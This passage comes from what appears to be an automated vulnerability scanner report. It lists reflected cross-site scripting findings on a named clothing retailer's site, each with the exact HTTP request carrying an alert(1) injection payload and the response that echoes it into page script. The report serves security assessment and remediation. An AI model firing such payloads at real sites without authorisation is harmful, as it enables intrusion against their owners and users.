This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/knitwear6b4c2"-alert(1)-"ba5b05c538c/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:01:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=64rrfdccnav5m7b6pccdkibtl1; expires=Tue, 09-Nov-2010 17:01:57 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/knitwear6b4c2"-alert(1)-"ba5b05c538c/");
//]]>
...[SNIP]...

1.213. http://www.fredperry.com/men/knitwear/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/knitwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2b99"-alert(1)-"b505e6d38e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/knitwear/?e2b99"-alert(1)-"b505e6d38e3=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hq2hfb1u0vk5sq9um71vvc1je1; expires=Tue, 09-Nov-2010 17:00:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Knitwea
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/knitwear/?e2b99"-alert(1)-"b505e6d38e3=1");
//]]>
...[SNIP]...

1.214. http://www.fredperry.com/men/shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d63e5"-alert(1)-"f5e78f500b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mend63e5"-alert(1)-"f5e78f500b1/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:01:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=smj18gun57kdkd0467j6k2ble0; expires=Tue, 09-Nov-2010 17:01:26 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/mend63e5"-alert(1)-"f5e78f500b1/shirts/");
//]]>
...[SNIP]...

1.215. http://www.fredperry.com/men/shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c7c4"-alert(1)-"ab334987f53 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/shirts1c7c4"-alert(1)-"ab334987f53/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:01:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=q7shd2ampm5hb37fpk1t5lpef0; expires=Tue, 09-Nov-2010 17:01:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/shirts1c7c4"-alert(1)-"ab334987f53/");
//]]>
...[SNIP]...

1.216. http://www.fredperry.com/men/shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89931"-alert(1)-"4ce4c5dd22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/shirts/?89931"-alert(1)-"4ce4c5dd22=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=r9bl983eqckpoi5qide0uqtdk7; expires=Tue, 09-Nov-2010 17:00:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's S
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/shirts/?89931"-alert(1)-"4ce4c5dd22=1");
//]]>
...[SNIP]...

1.217. http://www.fredperry.com/men/t-shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/t-shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98f6f"-alert(1)-"8259a03e431 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men98f6f"-alert(1)-"8259a03e431/t-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cpnpt2cakueaginagvi7a3ccr3; expires=Tue, 09-Nov-2010 17:02:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men98f6f"-alert(1)-"8259a03e431/t-shirts/");
//]]>
...[SNIP]...

1.218. http://www.fredperry.com/men/t-shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/t-shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ee9e"-alert(1)-"5e40d014b78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/t-shirts9ee9e"-alert(1)-"5e40d014b78/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=s9pds8t8hgp1kss83ab38dr1n7; expires=Tue, 09-Nov-2010 17:02:21 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/t-shirts9ee9e"-alert(1)-"5e40d014b78/");
//]]>
...[SNIP]...

1.219. http://www.fredperry.com/men/t-shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/t-shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7b5e"-alert(1)-"444542d087e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/t-shirts/?a7b5e"-alert(1)-"444542d087e=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8julcge7l3eu86jt983j9j80i2; expires=Tue, 09-Nov-2010 17:00:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> T-Shirt
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/t-shirts/?a7b5e"-alert(1)-"444542d087e=1");
//]]>
...[SNIP]...

1.220. http://www.fredperry.com/men/tennis/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/tennis/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b32d8"-alert(1)-"8e055ac8dec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /menb32d8"-alert(1)-"8e055ac8dec/tennis/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 15:59:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=f0fa2f8e8h2rpes2q3rqh16836; expires=Tue, 09-Nov-2010 16:59:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/menb32d8"-alert(1)-"8e055ac8dec/tennis/");
//]]>
...[SNIP]...

1.221. http://www.fredperry.com/men/tennis/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/tennis/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9404e"-alert(1)-"ba168a9b142 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/tennis9404e"-alert(1)-"ba168a9b142/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 15:59:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ijktja01c1msmhc06ponorhte7; expires=Tue, 09-Nov-2010 16:59:31 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/tennis9404e"-alert(1)-"ba168a9b142/");
//]]>
...[SNIP]...

1.222. http://www.fredperry.com/men/tennis/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/tennis/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3032"-alert(1)-"08334eb7cc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/tennis/?b3032"-alert(1)-"08334eb7cc3=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:58:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ahniq827j27m6f4gaeuunsfdo4; expires=Tue, 09-Nov-2010 16:58:37 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Tennis
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/tennis/?b3032"-alert(1)-"08334eb7cc3=1");
//]]>
...[SNIP]...

1.223. http://www.fredperry.com/men/track-jackets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/track-jackets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b540b"-alert(1)-"d6d90d603e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /menb540b"-alert(1)-"d6d90d603e1/track-jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:01:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=2lp41odj8d5fkstds9t06rrt80; expires=Tue, 09-Nov-2010 17:01:56 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/menb540b"-alert(1)-"d6d90d603e1/track-jackets/");
//]]>
...[SNIP]...

1.224. http://www.fredperry.com/men/track-jackets/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/track-jackets/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f64a"-alert(1)-"cbf3aada87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/track-jackets9f64a"-alert(1)-"cbf3aada87/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=k8brnmco109mo4fdmvep7dio44; expires=Tue, 09-Nov-2010 17:02:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/track-jackets9f64a"-alert(1)-"cbf3aada87/");
//]]>
...[SNIP]...

1.225. http://www.fredperry.com/men/track-jackets/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/track-jackets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e0d1"-alert(1)-"d9c3a859d62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/track-jackets/?3e0d1"-alert(1)-"d9c3a859d62=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rurooq2eta8jp8rpvoms7jg661; expires=Tue, 09-Nov-2010 17:00:44 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35392

